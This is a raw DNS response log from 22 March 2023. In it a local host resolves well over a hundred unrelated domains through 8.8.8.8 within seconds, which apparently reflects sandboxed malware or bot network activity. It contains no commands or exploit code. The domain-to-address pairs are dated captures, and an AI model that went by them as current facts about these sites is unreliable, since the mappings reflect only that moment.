Mar 22, 2023 05:45:30.934541941 CET	8.8.8.8	192.168.2.5	0xf55f	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:30.988805056 CET	8.8.8.8	192.168.2.5	0x225b	No error (0)	cbaben.com		173.205.126.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.044521093 CET	8.8.8.8	192.168.2.5	0x4083	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.089828014 CET	8.8.8.8	192.168.2.5	0x3f44	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.189779043 CET	8.8.8.8	192.168.2.5	0x9e40	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.201559067 CET	8.8.8.8	192.168.2.5	0x1a96	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.201559067 CET	8.8.8.8	192.168.2.5	0x1a96	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.249308109 CET	8.8.8.8	192.168.2.5	0x87f8	No error (0)	e-kami.net		202.172.28.89	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.287642956 CET	8.8.8.8	192.168.2.5	0x6aed	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.304361105 CET	8.8.8.8	192.168.2.5	0x6db3	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.304361105 CET	8.8.8.8	192.168.2.5	0x6db3	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.306799889 CET	8.8.8.8	192.168.2.5	0x485f	No error (0)	enguita.net		195.5.116.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.310754061 CET	8.8.8.8	192.168.2.5	0x2292	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.310754061 CET	8.8.8.8	192.168.2.5	0x2292	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.318605900 CET	8.8.8.8	192.168.2.5	0x9aeb	No error (0)	www.spanesi.com		5.196.166.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.320821047 CET	8.8.8.8	192.168.2.5	0xf1ab	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.320821047 CET	8.8.8.8	192.168.2.5	0xf1ab	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.323698044 CET	8.8.8.8	192.168.2.5	0x8709	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.330008030 CET	8.8.8.8	192.168.2.5	0x539	No error (0)	ssm.ch		93.189.66.202	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.340009928 CET	8.8.8.8	192.168.2.5	0xae74	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.370712996 CET	8.8.8.8	192.168.2.5	0xc358	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.408901930 CET	8.8.8.8	192.168.2.5	0x5e43	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.408901930 CET	8.8.8.8	192.168.2.5	0x5e43	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.408901930 CET	8.8.8.8	192.168.2.5	0x5e43	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.408901930 CET	8.8.8.8	192.168.2.5	0x5e43	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.431586981 CET	8.8.8.8	192.168.2.5	0x276d	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.501948118 CET	8.8.8.8	192.168.2.5	0xd1f3	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:31.501948118 CET	8.8.8.8	192.168.2.5	0xd1f3	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.524199009 CET	8.8.8.8	192.168.2.5	0xb193	No error (0)	www.tc17.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.524199009 CET	8.8.8.8	192.168.2.5	0xb193	No error (0)	www.tc17.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.564188957 CET	8.8.8.8	192.168.2.5	0x79b9	No error (0)	kairel.com		54.217.118.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.572705030 CET	8.8.8.8	192.168.2.5	0xda69	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.572705030 CET	8.8.8.8	192.168.2.5	0xda69	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.587902069 CET	8.8.8.8	192.168.2.5	0xa110	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.618767977 CET	8.8.8.8	192.168.2.5	0x248	No error (0)	vivastay.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:31.618767977 CET	8.8.8.8	192.168.2.5	0x248	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:31.618767977 CET	8.8.8.8	192.168.2.5	0x248	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.618767977 CET	8.8.8.8	192.168.2.5	0x248	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.724571943 CET	8.8.8.8	192.168.2.5	0xdb21	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.857028008 CET	8.8.8.8	192.168.2.5	0x2500	No error (0)	midap.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.857028008 CET	8.8.8.8	192.168.2.5	0x2500	No error (0)	midap.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.857028008 CET	8.8.8.8	192.168.2.5	0x2500	No error (0)	midap.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.857028008 CET	8.8.8.8	192.168.2.5	0x2500	No error (0)	midap.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.865605116 CET	8.8.8.8	192.168.2.5	0x558f	No error (0)	icd-host.com		192.252.159.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.865605116 CET	8.8.8.8	192.168.2.5	0x558f	No error (0)	icd-host.com		192.252.159.165	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.928704023 CET	8.8.8.8	192.168.2.5	0xbce	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.928704023 CET	8.8.8.8	192.168.2.5	0xbce	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.994226933 CET	8.8.8.8	192.168.2.5	0xcbe9	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.084045887 CET	8.8.8.8	192.168.2.5	0xea8f	No error (0)	mondopp.net		173.231.184.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.189685106 CET	8.8.8.8	192.168.2.5	0x5f18	No error (0)	likangds.com		23.225.40.19	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.225235939 CET	8.8.8.8	192.168.2.5	0x967f	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.231209040 CET	8.8.8.8	192.168.2.5	0x124c	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.231209040 CET	8.8.8.8	192.168.2.5	0x124c	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.234502077 CET	8.8.8.8	192.168.2.5	0x8e74	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.315880060 CET	8.8.8.8	192.168.2.5	0xe3d5	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.323043108 CET	8.8.8.8	192.168.2.5	0x1827	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.323043108 CET	8.8.8.8	192.168.2.5	0x1827	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.323043108 CET	8.8.8.8	192.168.2.5	0x1827	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.443494081 CET	8.8.8.8	192.168.2.5	0x43ad	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.447710037 CET	8.8.8.8	192.168.2.5	0x3f22	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.497685909 CET	8.8.8.8	192.168.2.5	0x798f	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.669193029 CET	8.8.8.8	192.168.2.5	0x539	No error (0)	avse.hu		185.129.138.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.671412945 CET	8.8.8.8	192.168.2.5	0xdacc	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.693835020 CET	8.8.8.8	192.168.2.5	0xdb21	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.918154955 CET	8.8.8.8	192.168.2.5	0x967	No error (0)	angework.com		219.94.128.87	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.055325031 CET	8.8.8.8	192.168.2.5	0xed51	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.188309908 CET	8.8.8.8	192.168.2.5	0x536e	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.188309908 CET	8.8.8.8	192.168.2.5	0x536e	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.228059053 CET	8.8.8.8	192.168.2.5	0xa5ff	No error (0)	gbmfg.com		151.101.2.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.228059053 CET	8.8.8.8	192.168.2.5	0xa5ff	No error (0)	gbmfg.com		151.101.66.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.228059053 CET	8.8.8.8	192.168.2.5	0xa5ff	No error (0)	gbmfg.com		151.101.130.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.228059053 CET	8.8.8.8	192.168.2.5	0xa5ff	No error (0)	gbmfg.com		151.101.194.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.269773006 CET	8.8.8.8	192.168.2.5	0xdce2	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.316212893 CET	8.8.8.8	192.168.2.5	0x7b7d	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.322362900 CET	8.8.8.8	192.168.2.5	0x3cd9	No error (0)	www.11tochi.net		157.112.176.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.342822075 CET	8.8.8.8	192.168.2.5	0x3cd9	No error (0)	www.11tochi.net		157.112.176.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.349930048 CET	8.8.8.8	192.168.2.5	0x88cf	No error (0)	oaith.ca		192.124.249.12	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.353398085 CET	8.8.8.8	192.168.2.5	0x8450	No error (0)	doggybag.org		213.186.33.16	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.486277103 CET	8.8.8.8	192.168.2.5	0xbe2	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.632700920 CET	8.8.8.8	192.168.2.5	0xc599	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.717053890 CET	8.8.8.8	192.168.2.5	0xd4f7	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.728099108 CET	8.8.8.8	192.168.2.5	0xc2e0	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.754446030 CET	8.8.8.8	192.168.2.5	0xdb21	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.776669979 CET	8.8.8.8	192.168.2.5	0xf0f8	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.785689116 CET	8.8.8.8	192.168.2.5	0x5150	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:33.785689116 CET	8.8.8.8	192.168.2.5	0x5150	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:33.785689116 CET	8.8.8.8	192.168.2.5	0x5150	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:33.785689116 CET	8.8.8.8	192.168.2.5	0x5150	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.804929972 CET	8.8.8.8	192.168.2.5	0x92a2	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.821676016 CET	8.8.8.8	192.168.2.5	0xd789	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.839418888 CET	8.8.8.8	192.168.2.5	0xf0f8	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.122828007 CET	8.8.8.8	192.168.2.5	0x8b09	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.123622894 CET	8.8.8.8	192.168.2.5	0x9891	No error (0)	www.pb-games.com	pb-games.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.123622894 CET	8.8.8.8	192.168.2.5	0x9891	No error (0)	pb-games.com		173.254.28.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.186124086 CET	8.8.8.8	192.168.2.5	0x6304	No error (0)	dspears.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.186124086 CET	8.8.8.8	192.168.2.5	0x6304	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.186124086 CET	8.8.8.8	192.168.2.5	0x6304	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.186124086 CET	8.8.8.8	192.168.2.5	0x6304	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.202215910 CET	8.8.8.8	192.168.2.5	0xf9bc	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.202332973 CET	8.8.8.8	192.168.2.5	0x6236	No error (0)	fdlymca.org		192.124.249.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.251163960 CET	8.8.8.8	192.168.2.5	0xff5	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.251163960 CET	8.8.8.8	192.168.2.5	0xff5	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.370037079 CET	8.8.8.8	192.168.2.5	0x7b7d	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.408158064 CET	8.8.8.8	192.168.2.5	0xd37c	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.521418095 CET	8.8.8.8	192.168.2.5	0x23c5	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.566871881 CET	8.8.8.8	192.168.2.5	0x46fb	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.712626934 CET	8.8.8.8	192.168.2.5	0xf289	No error (0)	umcor.am		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.712626934 CET	8.8.8.8	192.168.2.5	0xf289	No error (0)	umcor.am		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.808700085 CET	8.8.8.8	192.168.2.5	0x62d3	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.841777086 CET	8.8.8.8	192.168.2.5	0x5202	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.844147921 CET	8.8.8.8	192.168.2.5	0x86dd	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.844147921 CET	8.8.8.8	192.168.2.5	0x86dd	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.844198942 CET	8.8.8.8	192.168.2.5	0xb78e	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.844418049 CET	8.8.8.8	192.168.2.5	0x6550	No error (0)	webways.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.844418049 CET	8.8.8.8	192.168.2.5	0x6550	No error (0)	webways.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.845391035 CET	8.8.8.8	192.168.2.5	0x646	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.845779896 CET	8.8.8.8	192.168.2.5	0x7a9b	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.845779896 CET	8.8.8.8	192.168.2.5	0x7a9b	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.850604057 CET	8.8.8.8	192.168.2.5	0x6808	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.855129004 CET	8.8.8.8	192.168.2.5	0x5d8	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.856599092 CET	8.8.8.8	192.168.2.5	0x7fe0	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.857319117 CET	8.8.8.8	192.168.2.5	0xef98	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.857319117 CET	8.8.8.8	192.168.2.5	0xef98	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.858022928 CET	8.8.8.8	192.168.2.5	0x60f2	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.858022928 CET	8.8.8.8	192.168.2.5	0x60f2	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.860693932 CET	8.8.8.8	192.168.2.5	0x2901	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.861187935 CET	8.8.8.8	192.168.2.5	0x4fdc	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.862592936 CET	8.8.8.8	192.168.2.5	0x422f	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.862592936 CET	8.8.8.8	192.168.2.5	0x422f	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.864687920 CET	8.8.8.8	192.168.2.5	0x2cd6	No error (0)	agulatex.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.866394043 CET	8.8.8.8	192.168.2.5	0x1e0e	No error (0)	jnf.at		136.243.147.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.869652987 CET	8.8.8.8	192.168.2.5	0xfeee	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.869744062 CET	8.8.8.8	192.168.2.5	0x132c	No error (0)	gujarat.com		172.67.145.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.869744062 CET	8.8.8.8	192.168.2.5	0x132c	No error (0)	gujarat.com		104.21.73.143	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.870974064 CET	8.8.8.8	192.168.2.5	0x4402	No error (0)	oozkranj.com		212.44.102.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.871963024 CET	8.8.8.8	192.168.2.5	0x2973	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.872684002 CET	8.8.8.8	192.168.2.5	0x13c0	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.872684002 CET	8.8.8.8	192.168.2.5	0x13c0	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.874120951 CET	8.8.8.8	192.168.2.5	0x1440	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.874120951 CET	8.8.8.8	192.168.2.5	0x1440	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.876615047 CET	8.8.8.8	192.168.2.5	0xb9b3	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.885375977 CET	8.8.8.8	192.168.2.5	0x2c0f	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.907001972 CET	8.8.8.8	192.168.2.5	0xb9f4	No error (0)	kewlmail.com		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.908344030 CET	8.8.8.8	192.168.2.5	0x6302	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.909045935 CET	8.8.8.8	192.168.2.5	0x4f21	No error (0)	shztm.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.914314985 CET	8.8.8.8	192.168.2.5	0xc65c	No error (0)	rast.se		89.221.250.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.916841984 CET	8.8.8.8	192.168.2.5	0xc8f8	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.916841984 CET	8.8.8.8	192.168.2.5	0xc8f8	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.918792009 CET	8.8.8.8	192.168.2.5	0xe9af	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.928555965 CET	8.8.8.8	192.168.2.5	0xba84	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.929960012 CET	8.8.8.8	192.168.2.5	0x5d1f	No error (0)	agulatex.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.933645010 CET	8.8.8.8	192.168.2.5	0x11c4	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.937923908 CET	8.8.8.8	192.168.2.5	0x5032	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.940035105 CET	8.8.8.8	192.168.2.5	0xece2	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.940084934 CET	8.8.8.8	192.168.2.5	0xf3c7	No error (0)	tbvlugus.nl		174.129.25.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.940257072 CET	8.8.8.8	192.168.2.5	0x6441	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.943289042 CET	8.8.8.8	192.168.2.5	0x72f6	No error (0)	cutchie.com		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.945486069 CET	8.8.8.8	192.168.2.5	0x5245	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.945486069 CET	8.8.8.8	192.168.2.5	0x5245	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947534084 CET	8.8.8.8	192.168.2.5	0xe35c	No error (0)	araax.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947534084 CET	8.8.8.8	192.168.2.5	0xe35c	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947534084 CET	8.8.8.8	192.168.2.5	0xe35c	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947534084 CET	8.8.8.8	192.168.2.5	0xe35c	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947699070 CET	8.8.8.8	192.168.2.5	0x9f92	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.947699070 CET	8.8.8.8	192.168.2.5	0x9f92	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.948898077 CET	8.8.8.8	192.168.2.5	0xcc5b	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.950936079 CET	8.8.8.8	192.168.2.5	0x1e0f	No error (0)	anduran.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.950936079 CET	8.8.8.8	192.168.2.5	0x1e0f	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:34.950936079 CET	8.8.8.8	192.168.2.5	0x1e0f	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.950936079 CET	8.8.8.8	192.168.2.5	0x1e0f	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.951754093 CET	8.8.8.8	192.168.2.5	0x868	No error (0)	popbook.com		47.91.167.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.955327034 CET	8.8.8.8	192.168.2.5	0x3e65	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.955327034 CET	8.8.8.8	192.168.2.5	0x3e65	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
